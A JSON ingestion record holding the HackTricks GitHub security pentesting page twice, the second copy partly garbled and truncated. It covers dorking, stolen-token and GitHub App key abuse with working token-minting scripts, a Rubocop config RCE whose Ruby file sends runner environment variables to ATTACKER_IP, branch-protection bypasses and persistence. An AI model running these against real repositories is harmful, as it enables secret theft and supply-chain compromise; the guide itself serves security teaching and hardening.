{
  "id": "hacktricks-cloud-github-security",
  "title": "HackTricks Cloud - Github Security",
  "framework": "hacktricks-cloud",
  "source_type": "markdown",
  "language": "en",
  "path": "data/raw/hacktricks-cloud/github-security.md",
  "origin": "https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/src/pentesting-ci-cd/github-security/README.md",
  "ingestion_status": "discovered",
  "processing_status": "processed",
  "loader_type": "markdown",
  "text": "# Github Security\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## What is Github\n\n(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.\n\n### Basic Information\n\n{{#ref}}\nbasic-github-information.md\n{{#endref}}\n\n## External Recon\n\nGithub repositories can be configured as public, private and internal.\n\n- **Private** means that **only** people of the **organisation** will be able to access them\n- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it\n- **Public** means that **all internet** is going to be able to access it.\n\nIn case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.\n\n### Github Dorks\n\nGithub allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.\n\nTools (each tool contains its list of dorks):\n\n- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))\n- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))\n- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))\n\n### Github Leaks\n\nPlease, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).\n\nTools (each tool contains its list of regexes):\n\nCheck this page: **[https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.html)**\n\n> [!WARNING]\n> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!\n\n### External Forks\n\nIt's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](#execution-from-a-external-fork).\n\n### Github Leaks in deleted/internal forks\n\nEven if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:\n\n{{#ref}}\naccessible-deleted-data-in-github.md\n{{#endref}}\n\n## Organization Hardening\n\n### Member Privileges\n\nThere are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).\n\n- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.\n- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.\n- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.\n- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.\n  - _I couldn't find this info in the APIs response, share if you do_\n- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.\n  - _I couldn't find this info in the APIs response, share if you do_\n- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**\n  - _I couldn't find this info in the APIs response, share if you do_\n- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.\n  - _I couldn't find this info in the APIs response, share if you do_\n- **More things can be configured** in this page but the previous are the ones more security related.\n\n### Actions Settings\n\nSeveral security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.\n\n> [!NOTE]\n> Note that all this configurations can also be set on each repository independently\n\n- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.\n  - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)\n- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.\n  - _I couldn't find an API with this info, share if you do_\n- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.\n  - _I couldn't find an API with this info, share if you do_\n- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.\n  - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)\n\n### Integrations\n\n_Let me know if you know the API endpoint to access this info!_\n\n- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).\n- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).\n\n## Recon & Attacks abusing credentials\n\nFor this scenario we are going to suppose that you have obtained some access to a github account.\n\n### With User Credentials\n\nIf you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**\n\nNote that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.\n\n> [!NOTE]\n> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.\n\nCheck the section below about [**branch protections bypasses**](#branch-protection-bypass) in case it's useful.\n\n### With User SSH Key\n\nGithub allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).\n\nWith this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:\n\n```bash\n# Go to the the repository folder\n# Get repo config and current user name and email\ngit config --list\n```\n\nIf the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\\<github_username>.keys_, you could check this to confirm the private key you found can be used.\n\n**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.\n\n#### GPG Keys\n\nAs explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.\n\nCheck locally if the current user has any key with:\n\n```shell\ngpg --list-secret-keys --keyid-format=long\n```\n\n### With User Token\n\nFor an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).\n\nA user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.\n\nA User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`\n\n### With Oauth Application\n\nFor an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).\n\nAn attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.\n\nThese are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.\n\nMoreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.\n\n### With Github Application\n\nFor an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).\n\nAn attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.\n\nMoreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.\n\n#### Impersonate a GitHub App with its private key (JWT \u2192 installation access tokens)\n\nIf you obtain the private key (PEM) of a GitHub App, you can fully impersonate the app across all of its installations:\n\n- Generate a short\u2011lived JWT signed with the private key\n- Call the GitHub App REST API to enumerate installations\n- Mint per\u2011installation access tokens and use them to list/clone/push to repositories granted to that installation\n\nRequirements:\n- GitHub App private key (PEM)\n- GitHub App ID (numeric). GitHub requires iss to be the App ID\n\nCreate JWT (RS256):\n\n```python\n#!/usr/bin/env python3\nimport time, jwt\n\nwith open(\"priv.pem\", \"r\") as f:\n    signing_key = f.read()\n\nAPP_ID = \"123456\"  # GitHub App ID (numeric)\n\ndef gen_jwt():\n    now = int(time.time())\n    payload = {\n        \"iat\": now - 60,\n        \"exp\": now + 600 - 60,  # \u226410 minutes\n        \"iss\": APP_ID,\n    }\n    return jwt.encode(payload, signing_key, algorithm=\"RS256\")\n```\n\nList installations for the authenticated app:\n\n```bash\nJWT=$(python3 -c 'import time,jwt,sys;print(jwt.encode({\"iat\":int(time.time()-60),\"exp\":int(time.time())+540,\"iss\":sys.argv[1]}, open(\"priv.pem\").read(), algorithm=\"RS256\"))' 123456)\n\ncurl -sS -H \"Authorization: Bearer $JWT\" \\\n     -H \"Accept: application/vnd.github+json\" \\\n     -H \"X-GitHub-Api-Version: 2022-11-28\" \\\n     https://api.github.com/app/installations\n```\n\nCreate an installation access token (valid \u2264 10 minutes):\n\n```bash\nINSTALL_ID=12345678\ncurl -sS -X POST \\\n  -H \"Authorization: Bearer $JWT\" \\\n  -H \"Accept: application/vnd.github+json\" \\\n  -H \"X-GitHub-Api-Version: 2022-11-28\" \\\n  https://api.github.com/app/installations/$INSTALL_ID/access_tokens\n```\n\nUse the token to access code. You can clone or push using the x\u2011access\u2011token URL form:\n\n```bash\nTOKEN=ghs_...\nREPO=owner/name\n git clone https://x-access-token:${TOKEN}@github.com/${REPO}.git\n# push works if the app has contents:write on that repository\n```\n\nProgrammatic PoC to target a specific org and list private repos (PyGithub + PyJWT):\n\n```python\n#!/usr/bin/env python3\nimport time, jwt, requests\nfrom github import Auth, GithubIntegration\n\nwith open(\"priv.pem\", \"r\") as f:\n    signing_key = f.read()\n\nAPP_ID = \"123456\"  # GitHub App ID (numeric)\nORG    = \"someorg\"\n\ndef gen_jwt():\n    now = int(time.time())\n    payload = {\"iat\": now-60, \"exp\": now+540, \"iss\": APP_ID}\n    return jwt.encode(payload, signing_key, algorithm=\"RS256\")\n\nauth = Auth.AppAuth(APP_ID, signing_key)\nGI = GithubIntegration(auth=auth)\ninstallation = GI.get_org_installation(ORG)\nprint(f\"Installation ID: {installation.id}\")\n\njwt_tok = gen_jwt()\nr = requests.post(\n    f\"https://api.github.com/app/installations/{installation.id}/access_tokens\",\n    headers={\n        \"Accept\": \"application/vnd.github+json\",\n        \"Authorization\": f\"Bearer {jwt_tok}\",\n        \"X-GitHub-Api-Version\": \"2022-11-28\",\n    },\n)\naccess_token = r.json()[\"token\"]\n\nprint(\"--- repos ---\")\nfor repo in installation.get_repos():\n    print(f\"* {repo.full_name} (private={repo.private})\")\n    clone_url = f\"https://x-access-token:{access_token}@github.com/{repo.full_name}.git\"\n    print(clone_url)\n```\n\nNotes:\n- Installation tokens inherit exactly the app\u2019s repository\u2011level permissions (for example, contents: write, pull_requests: write)\n- Tokens expire in \u226410 minutes, but new tokens can be minted indefinitely as long as you retain the private key\n- You can also enumerate installations via the REST API (GET /app/installations) using the JWT\n\n## Compromise & Abuse Github Action\n\nThere are several techniques to compromise and abuse a Github Action, check them here:\n\n{{#ref}}\nabusing-github-actions/\n{{#endref}}\n\n## Abusing third\u2011party GitHub Apps running external tools (Rubocop extension RCE)\n\nSome GitHub Apps and PR review services execute external linters/SAST against pull requests using repository\u2011controlled configuration files. If a supported tool allows dynamic code loading, a PR can achieve RCE on the service\u2019s runner.\n\nExample: Rubocop supports loading extensions from its YAML config. If the service passes through a repo\u2011provided .rubocop.yml, you can execute arbitrary Ruby by requiring a local file.\n\n- Trigger conditions usually include:\n  - The tool is enabled in the service\n  - The PR contains files the tool recognizes (for Rubocop: .rb)\n  - The repo contains the tool\u2019s config file (Rubocop searches for .rubocop.yml anywhere)\n\nExploit files in the PR:\n\n.rubocop.yml\n\n```yaml\nrequire:\n  - ./ext.rb\n```\n\next.rb (exfiltrate runner env vars):\n\n```ruby\nrequire 'net/http'\nrequire 'uri'\nrequire 'json'\n\nenv_vars  = ENV.to_h\njson_data = env_vars.to_json\nurl       = URI.parse('http://ATTACKER_IP/')\n\nbegin\n  http = Net::HTTP.new(url.host, url.port)\n  req = Net::HTTP::Post.new(url.path)\n  req['Content-Type'] = 'application/json'\n  req.body = json_data\n  http.request(req)\nrescue StandardError => e\n  warn e.message\nend\n```\n\nAlso include a sufficiently large dummy Ruby file (e.g., main.rb) so the linter actually runs.\n\nImpact observed in the wild:\n- Full code execution on the production runner that executed the linter\n- Exfiltration of sensitive environment variables, including the GitHub App private key used by the service, API keys, DB credentials, etc.\n- With a leaked GitHub App private key you can mint installation tokens and get read/write access to all repositories granted to that app (see the section above on GitHub App impersonation)\n\nHardening guidelines for services running external tools:\n- Treat repository\u2011provided tool configs as untrusted code\n- Execute tools in tightly isolated sandboxes with no sensitive environment variables mounted\n- Apply least\u2011privilege credentials and filesystem isolation, and restrict/deny outbound network egress for tools that don\u2019t require internet access\n\n## Branch Protection Bypass\n\n- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.\n  - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._\n- **Dismiss approvals when new commits are pushed**: If this isn\u2019t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.\n- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.\n  - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**\n- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.\n- **Include administrators**: If this isn\u2019t set and you are admin of the repo, you can bypass this branch protections.\n- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.\n- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.\n- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).\n  - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.\n\n## Bypass Environments Protections\n\nFor an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).\n\nIn case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).\n\nNote, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.\n\n```yaml\npush: # Run it when a push is made to a branch\n  branches:\n    - current_branch_name #Use '**' to run when a push is made to any branch\n```\n\nNote that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.\n\n## Persistence\n\n- Generate **user token**\n- Steal **github tokens** from **secrets**\n  - **Deletion** of workflow **results** and **branches**\n- Give **more permissions to all the org**\n- Create **webhooks** to exfiltrate information\n- Invite **outside collaborators**\n- **Remove** **webhooks** used by the **SIEM**\n- Create/modify **Github Action** with a **backdoor**\n- Find **vulnerable Github Action to command injection** via **secret** value modification\n\n### Imposter Commits - Backdoor via repo commits\n\nIn Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.\n\nLike [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):\n\n```yaml\nname: example\non: [push]\njobs:\n  commit:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e\n      - shell: bash\n        run: |\n          echo 'hello world!'\n```\n\nFor more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)\n\n## References\n\n- [How we exploited CodeRabbit: from a simple PR to RCE and write access on 1M repositories](https://research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/)\n- [Rubocop extensions (require)](https://docs.rubocop.org/rubocop/latest/extensions.html)\n- [Authenticating with a GitHub App (JWT)](https://docs.github.com/en/apps/creating-github-apps/authenticating-with-a-github-app)\n- [List installations for the authenticated app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#list-installations-for-the-authenticated-app)\n- [Create an installation access token for an app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#create-an-installation-access-token-for-an-app)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n",
  "clean_text": "# Github Security\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## What is Github\n\n(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.\n\n### Basic Information\n\n{{#ref}}\nbasic-github-information.md\n{{#endref}}\n\n## External Recon\n\nGithub repositories can be configured as public, private and internal.\n\n- **Private** means that **only** people of the **organisation** will be able to access them\n- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it\n- **Public** means that **all internet** is going to be able to access it.\n\nIn case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.\n\n### Github Dorks\n\nGithub allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.\n\nTools (each tool contains its list of dorks):\n\n- ([Dorks list(https://github.com/obheda12/GitDorker/tree/master/Dorks))\n- ([Dorks list(https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))\n- ([Dorks list(https://github.com/hisxo/gitGraber/tree/master/wordlists))\n\n### Github Leaks\n\nPlease, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).\n\nTools (each tool contains its list of regexes):\n\nCheck this page: **> [!WARNING\n> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!\n\n### External Forks\n\nIt's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](#execution-from-a-external-fork).\n\n### Github Leaks in deleted/internal forks\n\nEven if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:\n\n{{#ref}}\naccessible-deleted-data-in-github.md\n{{#endref}}\n\n## Organization Hardening\n\n### Member Privileges\n\nThere are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).\n\n- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.\n- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.\n- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.\n- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.\n - _I couldn't find this info in the APIs response, share if you do_\n- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.\n - _I couldn't find this info in the APIs response, share if you do_\n- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**\n - _I couldn't find this info in the APIs response, share if you do_\n- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.\n - _I couldn't find this info in the APIs response, share if you do_\n- **More things can be configured** in this page but the previous are the ones more security related.\n\n### Actions Settings\n\nSeveral security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.\n\n> [!NOTE]\n> Note that all this configurations can also be set on each repository independently\n\n- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.\n - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)\n- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.\n - _I couldn't find an API with this info, share if you do_\n- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.\n - _I couldn't find an API with this info, share if you do_\n- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.\n - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)\n\n### Integrations\n\n_Let me know if you know the API endpoint to access this info!_\n\n- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).\n- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).\n\n## Recon & Attacks abusing credentials\n\nFor this scenario we are going to suppose that you have obtained some access to a github account.\n\n### With User Credentials\n\nIf you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**\n\nNote that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.\n\n> [!NOTE]\n> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.\n\nCheck the section below about [**branch protections bypasses**](#branch-protection-bypass) in case it's useful.\n\n### With User SSH Key\n\nGithub allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).\n\nWith this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:\n\n```bash\n# Go to the the repository folder\n# Get repo config and current user name and email\ngit config --list\n```\n\nIf the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\\<github_username>.keys_, you could check this to confirm the private key you found can be used.\n\n**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.\n\n#### GPG Keys\n\nAs explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.\n\nCheck locally if the current user has any key with:\n\n```shell\ngpg --list-secret-keys --keyid-format=long\n```\n\n### With User Token\n\nFor an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).\n\nA user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.\n\nA User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`\n\n### With Oauth Application\n\nFor an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).\n\nAn attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.\n\nThese are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.\n\nMoreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.\n\n### With Github Application\n\nFor an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).\n\nAn attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.\n\nMoreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.\n\n#### Impersonate a GitHub App with its private key (JWT \u2192 installation access tokens)\n\nIf you obtain the private key (PEM) of a GitHub App, you can fully impersonate the app across all of its installations:\n\n- Generate a short\u2011lived JWT signed with the private key\n- Call the GitHub App REST API to enumerate installations\n- Mint per\u2011installation access tokens and use them to list/clone/push to repositories granted to that installation\n\nRequirements:\n- GitHub App private key (PEM)\n- GitHub App ID (numeric). GitHub requires iss to be the App ID\n\nCreate JWT (RS256):\n\n```python\n#!/usr/bin/env python3\nimport time, jwt\n\nwith open(\"priv.pem\", \"r\") as f:\n signing_key = f.read()\n\nAPP_ID = \"123456\" # GitHub App ID (numeric)\n\ndef gen_jwt():\n now = int(time.time())\n payload = {\n \"iat\": now - 60,\n \"exp\": now + 600 - 60, # \u226410 minutes\n \"iss\": APP_ID,\n }\n return jwt.encode(payload, signing_key, algorithm=\"RS256\")\n```\n\nList installations for the authenticated app:\n\n```bash\nJWT=$(python3 -c 'import time,jwt,sys;print(jwt.encode({\"iat\":int(time.time()-60),\"exp\":int(time.time())+540,\"iss\":sys.argv[1]}, open(\"priv.pem\").read(), algorithm=\"RS256\"))' 123456)\n\ncurl -sS -H \"Authorization: Bearer $JWT\" \\\n -H \"Accept: application/vnd.github+json\" \\\n -H \"X-GitHub-Api-Version: 2022-11-28\" \\\n https://api.github.com/app/installations\n```\n\nCreate an installation access token (valid \u2264 10 minutes):\n\n```bash\nINSTALL_ID=12345678\ncurl -sS -X POST \\\n -H \"Authorization: Bearer $JWT\" \\\n -H \"Accept: application/vnd.github+json\" \\\n -H \"X-GitHub-Api-Version: 2022-11-28\" \\\n https://api.github.com/app/installations/$INSTALL_ID/access_tokens\n```\n\nUse the token to access code. You can clone or push using the x\u2011access\u2011token URL form:\n\n```bash\nTOKEN=ghs_...\nREPO=owner/name\n git clone https://x-access-token:${TOKEN}@github.com/${REPO}.git\n# push works if the app has contents:write on that repository\n```\n\nProgrammatic PoC to target a specific org and list private repos (PyGithub + PyJWT):\n\n```python\n#!/usr/bin/env python3\nimport time, jwt, requests\nfrom github import Auth, GithubIntegration\n\nwith open(\"priv.pem\", \"r\") as f:\n signing_key = f.read()\n\nAPP_ID = \"123456\" # GitHub App ID (numeric)\nORG = \"someorg\"\n\ndef gen_jwt():\n now = int(time.time())\n payload = {\"iat\": now-60, \"exp\": now+540, \"iss\": APP_ID}\n return jwt.encode(payload, signing_key, algorithm=\"RS256\")\n\nauth = Auth.AppAuth(APP_ID, signing_key)\nGI = GithubIntegration(auth=auth)\ninstallation = GI.get_org_installation(ORG)\nprint(f\"Installation ID: {installation.id}\")\n\njwt_tok = gen_jwt()\nr = requests.post(\n f\"https://api.github.com/app/installations/{installation.id}/access_tokens\",\n headers={\n \"Accept\": \"application/vnd.github+json\",\n \"Authorization\": f\"Bearer {jwt_tok}\",\n \"X-GitHub-Api-Version\": \"2022-11-28\",\n },\n)\naccess_token = r.json()[\"token\"]\n\nprint(\"--- repos ---\")\nfor repo in installation.get_repos():\n print(f\"* {repo.full_name} (private={repo.private})\")\n clone_url = f\"https://x-access-token:{access_token}@github.com/{repo.full_name}.git\"\n print(clone_url)\n```\n\nNotes:\n- Installation tokens inherit exactly the app\u2019s repository\u2011level permissions (for example, contents: write, pull_requests: write)\n- Tokens expire in \u226410 minutes, but new tokens can be minted indefinitely as long as you retain the private key\n- You can also enumerate installations via the REST API (GET /app/installations) using the JWT\n\n## Compromise & Abuse Github Action\n\nThere are several techniques to compromise and abuse a Github Action, check them here:\n\n{{#ref}}\nabusing-github-actions/\n{{#endref}}\n\n## Abusing third\u2011party GitHub Apps running external tools (Rubocop extension RCE)\n\nSome GitHub Apps and PR review services execute external linters/SAST against pull requests using repository\u2011controlled configuration files. If a supported tool allows dynamic code loading, a PR can achieve RCE on the service\u2019s runner.\n\nExample: Rubocop supports loading extensions from its YAML config. If the service passes through a repo\u2011provided .rubocop.yml, you can execute arbitrary Ruby by requiring a local file.\n\n- Trigger conditions usually include:\n - The tool is enabled in the service\n - The PR contains files the tool recognizes (for Rubocop: .rb)\n - The repo contains the tool\u2019s config file (Rubocop searches for .rubocop.yml anywhere)\n\nExploit files in the PR:\n\n.rubocop.yml\n\n```yaml\nrequire:\n - ./ext.rb\n```\n\next.rb (exfiltrate runner env vars):\n\n```ruby\nrequire 'net/http'\nrequire 'uri'\nrequire 'json'\n\nenv_vars = ENV.to_h\njson_data = env_vars.to_json\nurl = URI.parse('http://ATTACKER_IP/')\n\nbegin\n http = Net::HTTP.new(url.host, url.port)\n req = Net::HTTP::Post.new(url.path)\n req['Content-Type'] = 'application/json'\n req.body = json_data\n http.request(req)\nrescue StandardError => e\n warn e.message\nend\n```\n\nAlso include a sufficiently large dummy Ruby file (e.g., main.rb) so the linter actually runs.\n\nImpact 